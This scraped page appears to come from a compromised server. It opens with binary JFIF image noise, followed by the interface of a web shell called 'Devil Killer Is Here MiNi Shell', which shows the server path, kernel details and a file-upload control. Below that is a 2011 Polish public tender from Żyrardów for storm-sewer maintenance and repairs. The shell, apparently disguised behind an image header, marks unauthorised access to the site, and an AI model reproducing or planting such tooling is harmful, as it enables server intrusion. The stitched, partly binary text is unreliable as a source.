JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110204/41155-N-2011.html

<p class="kh_header"><b>Żyrardów: Bieżące utrzymanie kanalizacji deszczowej w okresie od podpisania umowy 
do 30 czerwca 2013 roku.</b><br>
<b>Numer ogłoszenia: 41155 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Żyrardów Wydział Gospodarki Komunalnej , Plac Jana Pawła II 1, 96-300 Żyrardów, woj. mazowieckie.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie kanalizacji deszczowej w okresie od podpisania umowy 
do 30 czerwca 2013 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie kanalizacji deszczowej Miasta Żyrardowa w okresie od podpisania umowy do 30 czerwca 2013 roku.
CPV Wspólny słownik zamówień publicznych: 
45332300-6 - Roboty instalacyjne, kanalizacyjne 
90641000-2 - Usługi oczyszczania kanałów ściekowych 
Zadanie obejmuje dwa zadania:
Zadanie 1 Utrzymanie w czystości i drożności kanalizacji deszczowej 
w mieście zawiera następujące elementy w tym: 
1. Prowadzenie monitoringu i dokumentacji eksploatacyjnej stanu sieci kanalizacji deszczowej,
2. Prowadzenie okresowych  badań jakości wód  w rzekach oraz wód deszczowych 
na wylotach kolektorów do odbiorników zgodnie z posiadanymi pozwoleniami wodno-prawnymi, Prawem wodnym, Prawem ochrony środowiska oraz obowiązującymi rozporządzeniami w tym zakresie,
3. Prowadzenie na bieżąco dokumentacji ilości wywożonych zanieczyszczeń z czyszczenia wpustów ulicznych, studni rewizyjnych, sieci kanalizacji deszczowej oraz separatorów
-prowadzenie Książek eksploatacji kanalizacji deszczowej.
4. Czyszczenie wpustów deszczowych z przykanalikami oraz wywóz osadu w uzgodnieniu 
z Zamawiającym- 135 szt. rocznie
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
 5. Czyszczenie studni rewizyjnych wraz z wywozem osadu w uzgodnieniu 
z Zamawiającym- 90 szt. rocznie
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
6. Udrażnianie z przepłukiwaniem kolektora wraz z wywozem osadu w uzgodnieniu 
z Zamawiającym zgodnie z kosztorysem ofertowym stanowiącym załącznik do wzoru umowy i SIWZ
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
7. Oczyszczanie separatorów i osadników ( odstojników szlamowych ) wraz z wywozem i utylizacją nieczystości przez jednostki do tego upoważnione:
-kontroli ilości szlamu  i ilości oleju,
-usuwanie produktów separacji,
-generalne czyszczenie komponentów urządzeń
8. Czyszczenie przepustów drogowych z namułu przy średnicy przepustu 
do 80 cm. 
9. Czyszczenie przepustów drogowych z namułu przy średnicy przepustu 
do 100 cm. 
10. Pompowanie wody z pasa drogowego wraz z wywozem na odległość do 5 km.
11. Bieżąca konserwacja i obsługa przepompowni ścieków deszczowych przy Wiatracznej 
Zadanie 2 Bieżące i awaryjne naprawy elementów systemu kanalizacji deszczowej 
w mieście Żyrardów w tym:
1. Uzupełnianie lub wymianę na bieżąco pokryw od włazów studni rewizyjnych 
i rusztów  wpustów ulicznych na sieci kanalizacji deszczowej,
2. Wymianę włazów studni rewizyjnych i kompletnych wpustów ulicznych oraz płyt nastudziennych na sieci kanalizacji deszczowej,
3. Bieżące naprawy, wymianę uszkodzonych fragmentów sieci kanalizacji deszczowej,
4. Wymianę i dołożenie kręgów betonowych,
5. Zapewnienie pogotowia technicznego do wykonania prac objętych zakresem umowy przez 24 godziny na dobę łącznie z dniami wolnymi od pracy,
6. Zabezpieczenie miejsca awarii zagrażającej bezpieczeństwu publicznemu w ciągu 
1 godziny od chwili otrzymania informacji od Zamawiającego,
7. Wykonanie przeglądu kanałów deszczowych według potrzeb, po uzyskaniu informacji od Zamawiającego,
8. Wykonanie prac dodatkowych, które obejmują sprawdzenie przebiegu sieci, usytuowania uzbrojenia ( studnia, wpust, wylot) po uzyskaniu informacji od Zamawiającego. Wszystkie prace powinny być prowadzone zgodnie z obowiązującymi przepisami, normami technologią i sztuką budowlaną. 
W zakres przedmiotu zamówienia wchodzi również:
-zakup wszystkich materiałów i urządzeń niezbędnych do realizacji zamówienia
-wykonanie projektów organizacji ruchu na czas prowadzenia robót  ( jeżeli  zajdzie taka konieczność) 
-oznakowanie pasa drogowego i zabezpieczenie dojść i dojazdów do posesji oraz objazdów w czasie prowadzenia robót.
UWAGA! 
1.Wykonawca ponosi pełną odpowiedzialność za szkody wynikłe wskutek niewłaściwego wykonania prac i nie zabezpieczenia terenu na czas prowadzenia robót.
2.Oferent poniesie wszelkie koszty związane z przygotowaniem i złożeniem oferty.
3.Zaleca się, aby oferent zdobył wszelkie informacje dot. przedmiotu zamówienia np. dokonał wizji w terenie, co może być konieczne do przygotowania oferty i podpisania umowy.
4. Zgodnie z art. 144 ustawy prawo zamówień publicznych istnieje zakaz dokonywania istotnych zmian postanowień w zawartej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Zmiana umowy dokonana z naruszenie art. 144 ust. 1 ustawy prawo zamówień publicznych podlega unieważnieniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.23.00-6, 90.64.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności gospodarczej lub czynności 
w zakresie będącym przedmiotem zamówienia, jeżeli przepisy prawa nakłada  obowiązek ich posiadania - posiadają stosowne zezwolenie na prowadzenie działalności w zakresie transportu odpadów i odbierania odpadów komunalnych 
z Gminy Żyrardów. Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnione w rozdziale V pkt.1 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że wykonawca warunki spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.Posiadają niezbędną wiedzę i doświadczenie tzn.: 
Wykażą, że realizowali co najmniej jedno zamówienie dla:
zadania 1- z zakresu utrzymania w czystości i drożności kanalizacji, 
zadania 2 - z zakresu napraw kanalizacji,w ostatnich trzech latach tj. w latach 2008- 2010 o wartości minimalnej 50 000 PLN brutto każde, z podaniem ich wartości, przedmiotu zamówienia, dat wykonania wraz z dokumentami potwierdzającymi, że usługa została wykonana należycie
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnione w rozdziale V pkt.2 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że wykonawca warunki spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tzn:
1) Wykonawca powinien wykazać, że dysponuje odpowiednim sprzętem technicznym, w tym co najmniej:
a) dla zadania 1:
- samochodem ze sprzętem ciśnieniowym do mycia, czyszczenia i udrażniania kanalizacji
- samochodem asenizacyjnym
- samochodem dostawczym
b) dla zadania 2:
- samochodem dostawczym
- koparką
- dźwigiem lub urządzeniem dźwigowym
- agregatem prądotwórczym
- młotem pneumatycznym
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnione w rozdziale V pkt.3 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że wykonawca warunki spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) Wykazać, że dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia, 
w ilości nie mniejszej niż:
a) dla zadania 1- przynajmniej po jednej osobie do obsługi samochodu ze sprzętem ciśnieniowym i samochodu asenizacyjnego
b) dla zadania 2- przynajmniej jedną osobą posiadającą uprawnienia budowlane 
do nadzorowania robót instalacyjno- inżynieryjnych
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonana wg formuły spełnia- nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnione w rozdziale V pkt.3 SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że wykonawca warunki spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.Sytuacja ekonomiczna i finansowa, dotyczy obu zadań:
1) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej:
a) dla zadania 1- 80 000 zł
b) dla zadania 2- 50 000 zł;  
2) posiadają ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę ubezpieczenia nie mniejszą niż 200 000 zł w całym okresie obowiązywania umowy; 
   Ocena spełnienia  warunków wymaganych  od  wykonawcy zostanie dokonana według formuły  spełnia- nie spełnia,  w oparciu  o  informacje  zawarte  
w   dokumentach  i oświadczeniach wyszczególnionych w rozdziale V pkt.4 niniejszej SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że wykonawca warunki spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowane wzory umów z kosztorysami ofertowymi jednostkowymi</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zyradow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żyrardowa,Wydział Gospodarki Komunalnej pok.44  Plac Jana Pawła II nr 1 96-300 Żyradów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2011 godzina 09:00, miejsce: Urząd Miasta Żyrardowa,Wydział Gospodarki Komunalnej pok.44  Plac Jana Pawła II nr 1 96-300 Żyradów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie w czystości i drożności kanalizacji deszczowej w mieście zawiera następujące elementy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prowadzenie monitoringu i dokumentacji eksploatacyjnej stanu sieci kanalizacji deszczowej,
2. Prowadzenie okresowych  badań jakości wód  w rzekach oraz wód deszczowych 
na wylotach kolektorów do odbiorników zgodnie z posiadanymi pozwoleniami wodno-prawnymi, Prawem wodnym, Prawem ochrony środowiska oraz obowiązującymi rozporządzeniami w tym zakresie,
3. Prowadzenie na bieżąco dokumentacji ilości wywożonych zanieczyszczeń z czyszczenia wpustów ulicznych, studni rewizyjnych, sieci kanalizacji deszczowej oraz separatorów
-prowadzenie Książek eksploatacji kanalizacji deszczowej.
4. Czyszczenie wpustów deszczowych z przykanalikami oraz wywóz osadu w uzgodnieniu z Zamawiającym- 135 szt. rocznie
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
 5. Czyszczenie studni rewizyjnych wraz z wywozem osadu w uzgodnieniu 
z Zamawiającym- 90 szt. rocznie
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
6. Udrażnianie z przepłukiwaniem kolektora wraz z wywozem osadu w uzgodnieniu 
z Zamawiającym zgodnie z kosztorysem ofertowym stanowiącym załącznik do wzoru umowy i SIWZ
-awaryjne czyszczenie elementów kanalizacji w terminie 2 godz. od momentu zgłoszenia łącznie z dniami wolnymi od pracy niezależnie od pory doby.
7. Oczyszczanie separatorów i osadników ( odstojników szlamowych ) wraz z wywozem i utylizacją nieczystości przez jednostki do tego upoważnione:
-kontroli ilości szlamu  i ilości oleju,
-usuwanie produktów separacji,
-generalne czyszczenie komponentów urządzeń
8. Czyszczenie przepustów drogowych z namułu przy średnicy przepustu 
do 80 cm. 
9. Czyszczenie przepustów drogowych z namułu przy średnicy przepustu 
do 100 cm. 
10. Pompowanie wody z pasa drogowego wraz z wywozem na odległość do 5 km.
11. Bieżąca konserwacja i obsługa przepompowni ścieków deszczowych przy Wiatracznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.64.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
